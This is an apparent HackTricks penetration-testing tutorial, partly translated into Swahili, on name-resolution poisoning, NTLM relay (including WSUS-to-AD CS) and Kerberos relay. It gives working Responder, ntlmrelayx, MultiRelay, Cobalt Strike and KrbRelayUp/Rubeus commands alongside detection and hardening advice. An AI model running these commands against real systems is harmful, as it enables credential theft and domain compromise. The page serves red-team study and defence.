Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Protokoli za Mtandao

Protokoli za Utafutaji Majina za Host ya Ndani

  • LLMNR, NBT-NS, and mDNS:
  • Microsoft and other operating systems use LLMNR and NBT-NS for local name resolution when DNS fails. Similarly, Apple and Linux systems use mDNS.
  • Protokoli hizi zinaweza kutwaliwa na kufanyiwa spoofing kutokana na asili yao ya kutangaza bila uthibitisho kupitia UDP.
  • Responder and Dementor can be used to impersonate services by sending forged responses to hosts querying these protocols.
  • Further information on service impersonation using Responder can be found here.

Web Proxy Auto-Discovery Protocol (WPAD)

  • WPAD inaruhusu vibrauzeri kugundua mipangilio ya proxy moja kwa moja.
  • Ugunduzi hufanywa kupitia DHCP, DNS, au kurejea (fallback) kwa LLMNR na NBT-NS iwapo DNS inashindwa.
  • Responder can automate WPAD attacks, directing clients to malicious WPAD servers.

Responder/Dementor for Protocol Poisoning

  • Responder ni zana inayotumika kwa poisoning ya maswali ya LLMNR, NBT-NS, na mDNS, ikijibu kwa uchaguzi kulingana na aina za maswali, ikilenga hasa huduma za SMB.

  • It comes pre-installed in Kali Linux, configurable at /etc/responder/Responder.conf.

  • Responder inaonyesha captured hashes kwenye skrini na kuzihifadhi katika saraka /usr/share/responder/logs.

  • Inasaidia IPv4 na IPv6.

  • Windows version of Responder is available here.

  • Dementor expands on the topics of multicast poisoning and additionally acts as a rogue service provider (including CUPS RCE support)

  • Muundo wa jumla ni sawa na Responder na usanidi wa kina zaidi. (default is here: Dementor.toml)

  • Compatibility between Dementor and Responder is given here: Compatibility Matrix

  • Intro and Documentation here: Dementor - Docs

  • Fixes capture issues introduced by Responder on certain protocols

Running Responder

  • To run Responder with default settings: responder -I <Interface>
  • For more aggressive probing (with potential side effects): responder -I <Interface> -P -r -v
  • Techniques to capture NTLMv1 challenges/responses for easier cracking: responder -I <Interface> --lm --disable-ess
  • WPAD impersonation can be activated with: responder -I <Interface> --wpad
  • NetBIOS requests can be resolved to the attacker’s IP, and an authentication proxy can be set up: responder.py -I <interface> -Pv

Running Dementor

  • With detault settings applied: Dementor -I <interface>
  • With default settings in analysis mode: Dementor -I <interface> -A
  • Automatic NTLM session downgrade (ESS): Dementor -I <interface> -O NTLM.ExtendedSessionSecurity=Off
  • Run current session with custom config: Dementor -I <interface> --config <file.toml>

DHCP Poisoning with Responder

  • Kuiga majibu ya DHCP kunaweza kuchafua kwa kudumu taarifa za routing za mwathirika, ikitoa mbadala wa stealthier ikilinganishwa na ARP poisoning.
  • Inahitaji ujuzi sahihi wa usanidi wa mtandao wa lengo.
  • Running the attack: ./Responder.py -I eth0 -Pdv
  • Njia hii inaweza kwa ufanisi kushika NTLMv1/2 hashes, lakini inahitaji utunzaji wa makini ili kuepuka kuingilia mtandao.

Capturing Credentials with Responder/Dementor

  • Responder/Dementor itageuka kuwa huduma kutumia protokoli zilizotajwa hapo juu, ikishika credentials (usually NTLMv2 Challenge/Response) wakati mtumiaji anajaribu authenticate dhidi ya huduma zilizogeuzwa.
  • Attempts can be made to downgrade to NetNTLMv1 or disable ESS for easier credential cracking.

Ni muhimu kuzingatia kwamba kutumia mbinu hizi kunapaswa kufanywa kisheria na kwa maadili, kuhakikisha idhini sahihi na kuepuka kuharibu au kupata ufikiaji usioruhusiwa.

Inveigh

Inveigh ni zana kwa ajili ya penetration testers and red teamers, iliyoundwa kwa mifumo ya Windows. Inatoa functionalities similar to Responder, ikifanya spoofing na man-in-the-middle attacks. Zana imebadilika kutoka PowerShell script hadi C# binary, na Inveigh and InveighZero kama matoleo makuu. Vigezo vya kina na maelekezo yanapatikana katika wiki.

Inveigh inaweza kuendeshwa kupitia PowerShell:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Au kutekelezwa kama C# binary:

Inveigh.exe

NTLM Relay Attack

Shambulio hili linatumia vikao vya uthibitishaji vya SMB ili kupata ufikiaji wa mashine lengwa, na kutoa system shell ikiwa litafanikiwa. Masharti muhimu ni pamoja na:

  • Mtumiaji anayethibitisha lazima awe na ufikiaji wa Local Admin kwenye relayed host.
  • SMB signing inapaswa kuzimwa.

445 Port Forwarding and Tunneling

Katika hali ambapo kuingizwa moja kwa moja kwenye mtandao hauwezekani, trafiki kwenye port 445 inahitaji kupelekwa mbele na kutunelishwa. Vifaa kama PortBender husaidia kuhamisha trafiki ya port 445 kwenda port nyingine, jambo muhimu wakati local admin access inapatikana kwa ajili ya driver loading.

PortBender setup and operation in Cobalt Strike:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

Zana Nyingine za NTLM Relay Attack

  • Metasploit: Sanidi ukiwa na proxies, pamoja na maelezo ya local na remote host.
  • smbrelayx: Skripti ya Python kwa relaying SMB sessions na executing commands au deploying backdoors.
  • MultiRelay: Zana kutoka kwenye suite ya Responder inayoweza relay specific users au all users, execute commands, au dump hashes.

Kila zana inaweza kusanidiwa kufanya kazi kupitia SOCKS proxy inapohitajika, ikiiwezesha attacks hata kwa network access isiyo ya moja kwa moja.

Uendeshaji wa MultiRelay

MultiRelay inakimbizwa kutoka kwenye /usr/share/responder/tools directory, ikilenga specific IPs au users.

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Zana hizi na mbinu zinafanya seti kamili kwa kuendesha NTLM Relay attacks katika mazingira mbalimbali ya mtandao.

Kutumia vibaya WSUS HTTP (8530) kwa NTLM Relay kwa LDAP/SMB/AD CS (ESC8)

WSUS clients wanathibitisha kwa update server yao kwa kutumia NTLM juu ya HTTP (8530) au HTTPS (8531). Wakati HTTP imewezeshwa, client check-ins za mara kwa mara zinaweza kulazimishwa au kukamatwa kwenye segment ya ndani na kurudishiwa kwa ntlmrelayx kwenda LDAP/LDAPS/SMB au AD CS HTTP endpoints (ESC8) bila kuvunja hashes zozote. Hii inaingiliana na trafiki ya kawaida ya update na mara nyingi huzaa uthibitishaji wa akaunti za mashine (HOST$).

Unachotafuta

  • GPO/registry configuration chini ya HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate na …\WindowsUpdate\AU:
  • WUServer (mfano, http://wsus.domain.local:8530)
  • WUStatusServer (reporting URL)
  • UseWUServer (1 = WSUS; 0 = Microsoft Update)
  • DetectionFrequencyEnabled na DetectionFrequency (saa)
  • WSUS SOAP endpoints zinazotumika na clients juu ya HTTP:
  • /ClientWebService/client.asmx (approvals)
  • /ReportingWebService/reportingwebservice.asmx (status)
  • Default ports: 8530/tcp HTTP, 8531/tcp HTTPS

Uchunguzi

  • Isiyothibitishwa
  • Scan for listeners: nmap -sSVC -Pn –open -p 8530,8531 -iL
  • Sniff HTTP WSUS traffic via L2 MITM and log active clients/endpoints with wsusniff.py (HTTP only unless you can make clients trust your TLS cert).
  • Iliyothibitishwa
  • Parse SYSVOL GPOs for WSUS keys with MANSPIDER + regpol (wsuspider.sh wrapper summarises WUServer/WUStatusServer/UseWUServer).
  • Query endpoints at scale from hosts (NetExec) or locally: nxc smb -u -p -M reg-query -o PATH=“HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate” KEY=“WUServer” reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate

Hatua za end-to-end za relay ya HTTP

  1. Panga nafasi kwa MITM (L2 ile ile) ili client iendelee kutatua WSUS server kwa wewe (ARP/DNS poisoning, Bettercap, mitm6, n.k.). Mfano na arpspoof: arpspoof -i -t <wsus_client_ip> <wsus_server_ip>

  2. Rudisha port 8530 kwenda kwenye relay listener yako (hiari, ni rahisi): iptables -t nat -A PREROUTING -p tcp –dport 8530 -j REDIRECT –to-ports 8530 iptables -t nat -L PREROUTING –line-numbers

  3. Anzisha ntlmrelayx na HTTP listener (inahitaji Impacket support kwa HTTP listener; angalia PRs hapa chini): ntlmrelayx.py -t ldap:// -smb2support -socks –keep-relaying –http-port 8530

Madhumuni mengine ya kawaida:

  • Relay kwenda SMB (ikiwa signing imezimwa) kwa exec/dump: -t smb://
  • Relay kwenda LDAPS kwa mabadiliko ya directory (mfano, RBCD): -t ldaps://
  • Relay kwenda AD CS web enrollment (ESC8) kutengeneza cert kisha kuthibitisha kupitia Schannel/PKINIT: ntlmrelayx.py –http-port 8530 -t http:///certsrv/certfnsh.asp –adcs –no-http-server Kwa njia za kina za kunyanyaswa AD CS na zana, angalia ukurasa wa AD CS:

AD CS Domain Escalation

  1. Sababisha client check-in au subiri ratiba. Kutoka kwa client: wuauclt.exe /detectnow au tumia Windows Update UI (Check for updates).

  2. Tumia vikao vya SOCKS vilivyoidhinishwa (ikiwa -socks) au matokeo ya relay ya moja kwa moja kwa post-exploitation (mabadiliko ya LDAP, operesheni za SMB, au utoaji wa cheti wa AD CS kwa uthibitishaji wa baadaye).

Kizuizi cha HTTPS (8531)

  • Kukamata kwa passivu WSUS juu ya HTTPS hakuwezi kufanikiwa isipokuwa clients wamwamini cert yako. Bila cert inayotambulika au kuvunja TLS vinginevyo, handshake ya NTLM haiwezi kukamatwa/kurudishwa kutoka kwa trafiki ya WSUS HTTPS.

Vidokezo

  • WSUS ilitangazwa kuwa deprecated lakini inabaki kutumika kwa wingi; HTTP (8530) bado ni ya kawaida katika mazingira mengi.
  • Vifaa vinavyosaidia: wsusniff.py (angalia HTTP WSUS check-ins), wsuspider.sh (orodhesha WUServer/WUStatusServer kutoka GPOs), NetExec reg-query kwa wingi.
  • Impacket ilirejesha msaada wa HTTP listener kwa ntlmrelayx katika PR #2034 (awali iliongezwa katika PR #913).

Force NTLM Logins

Kwenye Windows unaweza kufanikiwa kulazimisha akaunti zenye haki za juu kuthibitisha kwenye mashine yoyote. Soma ukurasa ufuatao kujifunza jinsi:

Force NTLM Privileged Authentication

Kerberos Relay attack

A Kerberos relay attack inachukua tiketi ya AP-REQ kutoka kwa service moja na kuitumia tena dhidi ya service ya pili ambayo inashare key ya akaunti ya kompyuta ile ile (kwa sababu SPNs zote mbili ziko kwenye akaunti ya mashine yenye $). Hii inafanya kazi hata kama daraja za huduma za SPNs ni tofauti (mfano CIFS/LDAP/) kwa sababu kifunguo kinachofungua tiketi ni NT hash ya mashine, si mfuatano wa SPN wenyewe na mfuatano wa SPN hauko sehemu ya saini.

Tofauti na NTLM relay, kuruka ni mdogo kwa host ile ile lakini, ikiwa unalenga itifaki inayokuruhusu kuandika kwa LDAP, unaweza kuunganisha ndani ya Resource-Based Constrained Delegation (RBCD) au AD CS enrollment na kupata NT AUTHORITY\SYSTEM kwa shambulio moja.

Kwa habari za kina kuhusu shambulio hili angalia:

TokenPurposeRelay relevance
TGT / AS-REQ ↔ REPProves the user to the KDCuntouched
Service ticket / TGS-REQ ↔ REPBound to one SPN; encrypted with the SPN owner’s keyinterchangeable if SPNs share account
AP-REQClient sends TGS to the servicewhat we steal & replay
  • Tickets zimefichwa kwa kutumia kifunguo kinachotokana na nywila cha akaunti inayomiliki SPN.
  • The Authenticator ndani ya AP-REQ ina timestamp ya dakika 5; matumizi tena ndani ya dirisha hilo ni halali hadi cache ya huduma itaona nakala.
  • Windows chini sana hukagua kama mfuatano wa SPN kwenye tiketi unaendana na huduma uliyoilenga, kwa hivyo tiketi ya CIFS/HOST kawaida inaundwa vizuri kwenye LDAP/HOST.
    1. Nini kinapaswa kuwa kweli ili kurelay Kerberos
  1. Shared key: source na target SPNs zinamilikiwa na akaunti ya kompyuta ile ile (chaguo-msingi kwenye Windows servers).
  2. No channel protection: SMB/LDAP signing off na EPA off kwa HTTP/LDAPS.
  3. You can intercept or coerce authentication: LLMNR/NBNS poison, DNS spoof, PetitPotam / DFSCoerce RPC, fake AuthIP, rogue DCOM, n.k..
  4. Chanzo cha tiketi kisitumike tayari: unashinda mbio kabla pakiti halisi ifike au kuizuia kabisa; vinginevyo cache ya replay ya server itasababisha Event 4649.
  5. Unahitaji kwa njia yoyote uweze kufanya MitM katika mawasiliano — labda kwa kuwa sehemu ya DNSAmins group ili kubadilisha DNS ya domain au kuweza kubadilisha faili ya HOST ya mwathiriwa.

Kerberos Relay Steps

  • 3.1 Recon the host
# find servers where HTTP, LDAP or CIFS share the same machine account
Get-ADComputer -Filter * -Properties servicePrincipalName |
Where-Object {$_.servicePrincipalName -match '(HTTP|LDAP|CIFS)'} |
Select Name,servicePrincipalName
  • 3.2 Anzisha relay listener

KrbRelayUp

# one-click local SYSTEM via RBCD
.\KrbRelayUp.exe relay --spn "ldap/DC01.lab.local" --method rbcd --clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8

KrbRelayUp inajumuisha KrbRelay → LDAP → RBCD → Rubeus → SCM bypass katika binary moja.

  • 3.3 Coerce Kerberos auth
# coerce DC to auth over SMB with DFSCoerce
.\dfscoerce.exe --target \\DC01.lab.local --listener 10.0.0.50

DFSCoerce husababisha DC itume tiketi ya Kerberos CIFS/DC01 kwetu.

  • 3.4 Kupitisha AP-REQ

KrbRelay hutoa GSS blob kutoka SMB, inarudisha ndani ya LDAP bind, na kuipitisha kwenda ldap://DC01—uthibitisho unafaulu kwa sababu ufunguo ule ule unaifungua.

  • 3.5 Tumia vibaya LDAP ➜ RBCD ➜ SYSTEM
# (auto inside KrbRelayUp) manual for clarity
New-MachineAccount -Name "FAKE01" -Password "P@ss123"
KrbRelay.exe -spn ldap/DC01 -rbcd FAKE01_SID
Rubeus s4u /user:FAKE01$ /rc4:<hash> /impersonateuser:administrator /msdsspn:HOST/DC01 /ptt
SCMUACBypass.exe

Sasa umemiliki NT AUTHORITY\SYSTEM.

Njia nyingine zinazostahili kujulikana

VectorTrickWhy it matters
AuthIP / IPSecServer bandia hutuma GSS-ID payload na SPN yoyote; mteja hujenga AP-REQ moja kwa moja kwakoInafanya kazi hata kati ya subnets; machine creds kwa chaguo-msingi
DCOM / MSRPCOXID resolver ya uharibifu inalazimisha mteja ku-auth kwa SPN na port yoyotePure local priv-esc; inazunguka firewall
AD CS Web EnrollRelay tiketi ya machine kwa HTTP/CA na pata cert, kisha PKINIT kutengeneza TGTsInapita defenses za LDAP signing
Shadow CredentialsAndika msDS-KeyCredentialLink, kisha PKINIT kwa pair ya key iliyotengenezwa kwa udanganyifuHakuna haja ya kuongeza account ya kompyuta

Troubleshooting

ErrorMeaningFix
KRB_AP_ERR_MODIFIEDTicket key ≠ target keyWrong host/SPN
KRB_AP_ERR_SKEWClock > 5 min offsetSync time or use w32tm
LDAP bind failsSigning enforcedUse AD CS path or disable signing
Event 4649 spamService saw duplicate AuthenticatorZuia au ‘race’ packet la asili

Detection

  • Kuongezeka kwa Event 4769 kwa CIFS/, HTTP/, LDAP/ kutoka chanzo kimoja ndani ya sekunde.
  • Event 4649 kwenye huduma inaonyesha replay imegunduliwa.
  • Kerberos logon kutoka 127.0.0.1 (relay to local SCM) ni ya shaka sana—fanya ramani kupitia Sigma rule katika KrbRelayUp docs.
  • Angalia mabadiliko ya sifa msDS-AllowedToActOnBehalfOfOtherIdentity au msDS-KeyCredentialLink.

Hardening

  1. Enforce LDAP & SMB signing + EPA kwenye kila server.
  2. Split SPNs ili HTTP isiwe kwenye account hiyo hiyo kama CIFS/LDAP.
  3. Patch coercion vectors (PetitPotam KB5005413, DFS, AuthIP).
  4. Set ms-DS-MachineAccountQuota = 0 ili kuzuia kompyuta zisizoidhinishwa kujiunga.
  5. Alert on Event 4649 and unexpected loopback Kerberos logons.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks